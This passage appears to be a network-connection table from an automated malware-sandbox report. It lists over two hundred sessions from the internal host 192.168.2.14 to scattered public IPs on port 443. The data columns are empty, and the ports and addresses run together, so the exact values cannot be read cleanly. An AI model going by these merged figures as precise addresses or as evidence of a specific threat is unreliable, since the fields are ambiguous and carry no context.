                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24749192.168.2.1440824134.56.65.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24750192.168.2.145661645.87.105.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24751192.168.2.143824253.133.213.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24752192.168.2.1442712160.102.156.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24753192.168.2.1459658141.108.68.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24754192.168.2.144191851.60.147.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24755192.168.2.145375259.61.211.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24756192.168.2.1445342159.81.101.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24757192.168.2.1455698103.168.82.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24758192.168.2.1448986171.16.29.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24759192.168.2.143564840.248.237.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24760192.168.2.1434296111.217.70.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24761192.168.2.143400289.167.243.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24762192.168.2.145284059.106.127.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24763192.168.2.145538058.76.23.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24764192.168.2.145004466.72.26.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24765192.168.2.1437128213.240.31.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24766192.168.2.144626077.163.159.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24767192.168.2.144522863.150.102.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24768192.168.2.1439874217.141.186.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24769192.168.2.1458706106.117.90.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24770192.168.2.1460516143.198.99.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24771192.168.2.1447224154.174.162.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24772192.168.2.1444574120.179.133.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24773192.168.2.143972885.104.173.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24774192.168.2.1438800150.63.132.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24775192.168.2.1434408193.93.147.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24776192.168.2.1449244208.121.124.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24777192.168.2.143808818.52.99.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24778192.168.2.145119032.204.173.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24779192.168.2.1437782198.57.252.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24780192.168.2.1450378206.43.21.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24781192.168.2.1440286199.254.98.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24782192.168.2.1441954128.167.190.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24783192.168.2.145687435.50.81.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24784192.168.2.144179839.88.222.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24785192.168.2.143507643.45.198.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24786192.168.2.145393834.220.83.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24787192.168.2.144619048.144.146.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24788192.168.2.1448422151.200.171.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24789192.168.2.146014461.100.251.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24790192.168.2.144877068.179.167.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24791192.168.2.1434508158.169.134.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24792192.168.2.146089425.31.243.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24793192.168.2.1440532142.241.21.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24794192.168.2.1458270191.61.96.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24795192.168.2.1438426179.227.67.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24796192.168.2.143513487.245.225.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24797192.168.2.1444948192.67.207.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24798192.168.2.1445882203.204.174.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24799192.168.2.1434356154.197.9.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24800192.168.2.1439390192.117.75.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24801192.168.2.1446290200.208.64.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24802192.168.2.1457496137.201.16.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24803192.168.2.1446040107.89.75.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24804192.168.2.1453376148.109.131.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24805192.168.2.1447450213.169.63.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24806192.168.2.1449112211.70.245.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24807192.168.2.144236886.210.139.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24808192.168.2.1441784136.121.76.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24809192.168.2.1459866183.118.170.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24810192.168.2.144995889.81.242.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24811192.168.2.145034612.223.69.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24812192.168.2.145390225.5.7.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24813192.168.2.143799820.90.115.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24814192.168.2.144638664.163.157.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24815192.168.2.1445678158.5.212.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24816192.168.2.145783254.244.56.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24817192.168.2.1439942204.85.253.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24818192.168.2.1447950163.120.154.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24819192.168.2.143678017.45.71.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24820192.168.2.1442108133.84.22.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24821192.168.2.143393438.100.247.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24822192.168.2.1443160124.26.142.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24823192.168.2.1438318188.14.12.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24824192.168.2.144582032.111.129.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24825192.168.2.144288265.37.79.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24826192.168.2.143373660.39.67.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24827192.168.2.1458422154.226.179.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24828192.168.2.1452546106.213.236.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24829192.168.2.145764898.49.36.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24830192.168.2.1441874116.73.82.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24831192.168.2.1455884168.29.212.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24832192.168.2.1456348117.242.202.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24833192.168.2.1444972172.245.192.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24834192.168.2.145356451.255.61.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24835192.168.2.143509682.9.96.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24836192.168.2.1436604119.204.11.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24837192.168.2.143830436.98.188.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24838192.168.2.145837684.195.232.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24839192.168.2.144355054.100.139.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24840192.168.2.1445306101.49.218.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24841192.168.2.143376890.98.191.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24842192.168.2.1449846216.205.117.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24843192.168.2.1449764106.39.97.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24844192.168.2.144286864.149.229.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24845192.168.2.1457190199.80.49.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24846192.168.2.1452014123.194.85.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24847192.168.2.143417219.157.81.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24848192.168.2.146080690.200.146.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24849192.168.2.1444464205.58.191.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24850192.168.2.143525678.54.153.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24851192.168.2.1437798147.68.180.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24852192.168.2.1450298199.99.42.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24853192.168.2.1448040159.162.218.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24854192.168.2.1449390165.217.194.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24855192.168.2.1432882102.15.172.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24856192.168.2.1442400157.49.188.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24857192.168.2.143940480.129.250.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24858192.168.2.145897845.193.223.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24859192.168.2.145039878.41.30.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24860192.168.2.145085094.2.101.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24861192.168.2.1451922107.58.127.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24862192.168.2.1458704171.206.190.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24863192.168.2.1438010198.20.149.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24864192.168.2.1445348221.127.109.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24865192.168.2.1454622154.255.149.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24866192.168.2.1447298113.86.98.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24867192.168.2.145657419.49.38.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24868192.168.2.1441410202.188.189.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24869192.168.2.144698453.180.248.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24870192.168.2.1452020145.7.244.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24871192.168.2.1445150187.240.167.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24872192.168.2.1453686183.38.37.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24873192.168.2.1456642159.172.142.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24874192.168.2.1442320202.210.18.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24875192.168.2.1439200205.67.219.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24876192.168.2.1437990170.249.217.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24877192.168.2.144492667.67.25.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24878192.168.2.143794683.214.98.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24879192.168.2.1438766177.182.142.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24880192.168.2.143400498.15.69.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24881192.168.2.145576840.137.137.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24882192.168.2.1437306218.131.166.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24883192.168.2.144887890.54.236.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24884192.168.2.1445558130.126.93.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24885192.168.2.145274286.206.108.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24886192.168.2.1457026208.111.170.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24887192.168.2.1451122157.41.200.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24888192.168.2.1456062178.53.223.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24889192.168.2.144461845.46.189.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24890192.168.2.14377585.85.106.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24891192.168.2.1433580136.133.175.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24892192.168.2.1441058155.19.151.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24893192.168.2.144094691.19.233.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24894192.168.2.145162613.106.253.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24895192.168.2.145285024.158.231.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24896192.168.2.1454296111.125.30.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24897192.168.2.1433434180.73.71.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24898192.168.2.14392448.10.111.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24899192.168.2.1451274113.199.141.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24900192.168.2.144253673.158.203.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24901192.168.2.1452446148.110.196.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24902192.168.2.1453072105.210.182.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24903192.168.2.14533768.158.204.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24904192.168.2.143626217.214.199.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24905192.168.2.1442636192.21.188.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24906192.168.2.1455040201.129.142.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24907192.168.2.145705667.104.213.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24908192.168.2.1447380223.144.189.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24909192.168.2.144858244.100.124.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24910192.168.2.1453514164.157.57.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24911192.168.2.145499458.116.26.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24912192.168.2.1438040216.11.81.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24913192.168.2.1447958131.150.169.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24914192.168.2.1460092153.132.122.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24915192.168.2.143955085.150.28.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24916192.168.2.1444458139.60.249.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24917192.168.2.1455946108.181.223.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24918192.168.2.1458318187.112.102.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24919192.168.2.1448448177.36.213.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24920192.168.2.1439848164.235.216.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24921192.168.2.1434574110.162.246.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24922192.168.2.143995450.136.79.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24923192.168.2.144755697.20.175.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24924192.168.2.1455364100.242.52.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24925192.168.2.1434000109.233.59.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24926192.168.2.144416461.247.11.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24927192.168.2.1453208157.4.70.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24928192.168.2.1436968103.62.75.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24929192.168.2.144166850.13.2.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24930192.168.2.1453180151.231.93.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24931192.168.2.1448800186.144.53.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24932192.168.2.143467049.173.124.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24933192.168.2.144874278.154.45.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24934192.168.2.1435444168.206.1.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24935192.168.2.145991238.57.239.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24936192.168.2.144327031.233.96.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24937192.168.2.1433962145.230.66.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24938192.168.2.1453672222.142.242.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24939192.168.2.1451490195.232.148.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24940192.168.2.1437550132.8.255.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24941192.168.2.1459846192.218.86.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24942192.168.2.1438392118.47.169.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24943192.168.2.1452250110.81.40.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24944192.168.2.1452006157.51.2.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24945192.168.2.143876451.66.42.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24946192.168.2.143601080.174.189.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24947192.168.2.145964241.164.45.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24948192.168.2.143829064.237.23.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24949192.168.2.1453900124.41.73.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24950192.168.2.1455356199.227.152.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24951192.168.2.1452786158.59.186.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24952192.168.2.1445252162.160.184.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24953192.168.2.145938083.199.136.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24954192.168.2.145555270.102.36.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24955192.168.2.1441140105.243.228.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24956192.168.2.143751277.18.203.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24957192.168.2.145508431.176.118.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24958192.168.2.1442766212.108.93.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24959192.168.2.145760499.84.129.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24960192.168.2.1450066164.175.90.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24961192.168.2.1435972162.47.114.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24962192.168.2.1436272136.96.238.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24963192.168.2.143703262.101.93.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24964192.168.2.1433718169.30.112.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24965192.168.2.145888440.178.118.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24966192.168.2.144979432.221.153.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24967192.168.2.143536075.254.87.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24968192.168.2.1455654177.51.162.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24969192.168.2.1454684203.130.35.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
